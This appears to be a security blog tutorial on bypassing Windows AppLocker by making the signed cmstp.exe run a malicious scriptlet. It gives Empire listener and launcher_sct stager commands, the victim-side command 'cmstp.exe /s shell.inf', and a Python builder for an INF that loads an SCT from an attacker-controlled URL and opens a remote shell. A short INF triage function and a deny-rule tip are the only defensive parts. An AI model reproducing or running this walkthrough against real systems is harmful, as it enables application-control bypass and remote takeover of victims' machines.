By default, AppLocker's rules allow anything under C:\Windows and Program Files to execute, and that is the major reason it can be bypassed: signed Microsoft binaries that live in those folders and can be made to run arbitrary code are not blocked. Several such binaries have been found to bypass AppLocker, and some of them bypass UAC as well. One of these Microsoft binaries is CMSTP (the Connection Manager Profile Installer, C:\Windows\System32\cmstp.exe). CMSTP takes an INF file as its input, so exploitation through a crafted INF is possible, and that is what we will be learning to do here.
The INF that CMSTP installs can instruct it to load scrobj.dll (the Windows scriptlet COM server) and hand it an SCT scriptlet file, which CMSTP then runs as a trusted, signed process without raising suspicion. We will therefore create a malicious SCT file that gives us a shell. We will use Empire PowerShell for this. For a detailed guide on Empire PowerShell, click here.
Launch the Empire framework from the Kali terminal and type the following commands to create a listener that the payload will call back to:
listeners
uselistener http
set Host 192.168.1.109
execute
The above commands create an HTTP listener. Type back to return from the listener interface, then generate the SCT file with the following stager:
usestager windows/launcher_sct
set Listener HTTP
execute
Running the above stager creates your SCT file. Next we need an INF file that makes CMSTP load and run it. In this INF script, set the path (or URL) of your SCT file on the line shown in the image.
Download this script from here:
Now transfer the INF file to the victim's PC (together with the SCT file if the INF points at a local path rather than a URL) and run the following command in the victim's command prompt, where /s runs the installation silently:
cmstp.exe /s shell.inf
As soon as the command runs, a new agent checks in to your Empire listener. Use the following command, followed by the agent name shown by the agents command, to access your session:
interact
This way, the CMSTP binary can be used to bypass AppLocker restrictions: CMSTP needs an INF file, and by controlling that INF you can make a trusted Microsoft binary run your scriptlet and gain access to the victim's PC. Because cmstp.exe is a signed binary in System32, it passes the default path and publisher rules; a custom AppLocker deny rule for cmstp.exe, or an alert on cmstp.exe launched with /s and an INF that references scrobj.dll, closes this route.
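As an added example, not the post's own script and not Empire's code: the INF layout below is the publicly documented one for driving cmstp.exe into scrobj.dll, with the SCT path, host and file names as placeholder assumptions. The first function writes that INF for a given SCT location; the second is the defender-side check that pulls the scriptlet target back out of an INF, which is useful when triaging INF files dropped on a host. The %11% token is the INF directory ID for the system directory (System32).

```python
import re

# Publicly documented INF layout for the cmstp.exe/scrobj.dll technique
# (added example; the placeholder SCT location is filled in by the caller).
# Every section except UnRegisterOCXSection is boilerplate cmstp expects.
INF_TEMPLATE = """[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\\scrobj.dll,NI,{sct}

[Strings]
AppAct = "SOFTWARE\\Microsoft\\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"
"""


def build_cmstp_inf(sct_location: str) -> str:
    """Return INF text whose UnRegisterOCXs entry points scrobj.dll at the
    given .sct path or URL (for example the Empire launcher_sct output)."""
    return INF_TEMPLATE.format(sct=sct_location)


def parse_inf_sections(inf_text: str) -> dict[str, list[str]]:
    """Minimal INF reader: map a section name (lower-cased) to its non-empty,
    non-comment lines. INF entries are not always key=value, so the stdlib
    configparser is deliberately not used."""
    sections: dict[str, list[str]] = {}
    current = None
    for raw in inf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = header.group(1).strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def scriptlet_targets(inf_text: str) -> list[str]:
    """Defender-side triage: return every target that a RegisterOCXs or
    UnRegisterOCXs section hands to scrobj.dll. An empty list means the INF
    does not use this trick (it may still be malicious in other ways)."""
    sections = parse_inf_sections(inf_text)
    # Follow the (Un)RegisterOCXs directives to the sections they name.
    ocx_sections = []
    for lines in sections.values():
        for line in lines:
            directive = re.fullmatch(r"(?i)(un)?registerocxs\s*=\s*(\S+)", line)
            if directive:
                ocx_sections.append(directive.group(2).lower())
    targets: list[str] = []
    for name in ocx_sections:
        for entry in sections.get(name, []):
            # Entry form: <dll>,<flags>,<argument passed to the dll>
            parts = [p.strip() for p in entry.split(",")]
            if len(parts) >= 3 and parts[0].lower().endswith("scrobj.dll"):
                targets.append(parts[2])
    return targets


if __name__ == "__main__":
    # Constructed placeholder location (assumption): the SCT served from the
    # attacker's web root or copied next to the INF on the victim.
    inf = build_cmstp_inf("http://192.168.1.109/launcher.sct")
    print(inf)
    print("scriptlet targets found:", scriptlet_targets(inf))
```

Write the returned INF text to shell.inf and run it with cmstp.exe /s shell.inf exactly as in the steps above; a URL target lets you skip copying the SCT to the victim, a local path requires the SCT to be present there. On the defensive side, running scriptlet_targets over any INF that cmstp.exe was launched with (or over INF files found in user-writable locations) gives a quick yes/no on whether this specific trick is in play.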